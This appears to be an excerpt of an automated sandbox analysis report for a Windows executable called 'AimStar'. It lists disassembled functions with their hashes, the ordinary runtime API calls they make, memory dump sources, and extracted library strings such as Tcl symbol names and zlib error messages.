                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                                          • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                          • Instruction ID: 9d356d35a4292c25bff258481bd2a4d704451e683775d0a0097d5c893bc7919f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68E08614F0CE0653FF047BB2A44717992686F84760FC44034C81D423A1EE2C799DC330
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(?,?,?,00007FF710F5AA45,?,?,00000000,00007FF710F5AAFA), ref: 00007FF710F5AC36
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF710F5AA45,?,?,00000000,00007FF710F5AAFA), ref: 00007FF710F5AC40
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 918212764-0
                                                                                                                                                                                                                                          • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                          • Instruction ID: 1048a9ef22b1386a641669696459e8910cb824b636df09723529b7f1934003eb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7421F621F1CF4202FB947761A49627DA6AA9F847B0F984235D91E473C1CE6CF55DC320
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                          • Instruction ID: aa72ee2592d382dd08425d545d729f8931765502da21ca7784fd98ff4e1ff4b3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B41FA3290CA0587EA34EB55A442279F3B8EB55B64F900231D68E837D1CF2DF60ACB61
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _fread_nolock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 840049012-0
                                                                                                                                                                                                                                          • Opcode ID: 9308b687cf4eea5a9f9c2c4d0625b2a01abdca647666c74d71e3793018cb6a8d
                                                                                                                                                                                                                                          • Instruction ID: 1a419967110c828ae5f09544322849f4f73aa95bdf616ce36ed783d756fdebf9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9308b687cf4eea5a9f9c2c4d0625b2a01abdca647666c74d71e3793018cb6a8d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB21B421B1CE9145FA10BA1665067BAD659BF45BE4FCC4430EE0D47786DE3DF14EC620
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                                          • Instruction ID: d256453a2c421d75ce99b316cd917a00d1563a8c4ac9bc046f766115c415cc2b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e965e93cbe1d72adb8351a0dc15ff4730447cd31f91a428760958f4d16ec249d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4316D21A1CE4685E7517B5598432BCA6B8AF40BB4FC20135EA2D133D2DF7CB64ACB31
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3947729631-0
                                                                                                                                                                                                                                          • Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                          • Instruction ID: 073918279951ffc2d929893a547785c42436c6ce7f95ed6e668adfbfd36ceb8e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6218331A0CF458AEB29AF64C4452EC77B8EB05728F840635D61D06BD5DF3CE688C760
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                          • Instruction ID: 112694b0c182173f9853aebfcad77bc136b04b966ce9d1756f840c6b9624079c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE115022A1CA4142EA60BF51A41617DF2B8AF45FA4FC44031EB4C97B96DF3CF648C720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                          • Instruction ID: c1dd9f59005675640eeff9b239c71591a89f5c2ba31457f648358fb3adfbc96f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E21957661CE4186D761AF18D482379B6A4EB88B64F944234E69D477D5DF3CE408CB10
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                          • Instruction ID: 10718e271cad2a571baf90d70102e54687d9dab54d5bfaaffa5820a2cb728e7d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A401A121A0CF8141EA04EF529912069E6A9AF85FF0F884631EE5C57BD6CE3CF645C310
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,?,00007FF710F50D00,?,?,?,00007FF710F5236A,?,?,?,?,?,00007FF710F53B59), ref: 00007FF710F5D6AA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                                          • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                          • Instruction ID: cfa75f89eccb75faac08515a7a85bbc1b4cb79bb9df22fd3d2dcb95fef91f69e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4F05E04B0FB0745FE647761581367892A84F557B0F884230DC2E453D2DE2CB58AC130
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                          • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                          • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                          • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                          • Instruction ID: 2fc94ddd97f4e76d324f9d26f35836474d51017f45c972260123f0ae09ccbc4f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91029228E0DF0B91EA15BB56A8179B5A7ADBF04775BC51132D81E423A4EF3CB58CC230
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                          • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                          • Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                                          • Instruction ID: 10237a29d663d1084e574aa32027ea75b1ba7eea8feeace9d1085da2efd95e24
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2B20776A1C6828BE724AF24D4427FDB7AAFB54798F801135DA0D57B84DF38B908CB50
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                          • API String ID: 0-2665694366
                                                                                                                                                                                                                                          • Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                                          • Instruction ID: df98eab0265f726f477f4bf18308fc7b45a8e16de63dd7711bc96691db3e1bbd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A52F772A18AA987D7949F24C459F7E7BADFB84350F414139EA4A877C0DB3CE848CB50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3140674995-0
                                                                                                                                                                                                                                          • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                          • Instruction ID: d16efa32864ed7a321df98741386e48a9af5a9e4d417308362dc1b0aaf0c4c62
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3313076608E8586EB60AF60E8517EE73A4FB84758F44403ADA4D47B94EF38D548C720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF710F65CB5
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F65608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6561C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F5A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9CE
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F5A9B8: GetLastError.KERNEL32(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9D8
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F5A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF710F5A94F,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5A979
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F5A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF710F5A94F,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5A99E
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF710F65CA4
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F65668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6567C
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF710F65F1A
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF710F65F2B
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF710F65F3C
                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF710F6617C), ref: 00007FF710F65F63
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
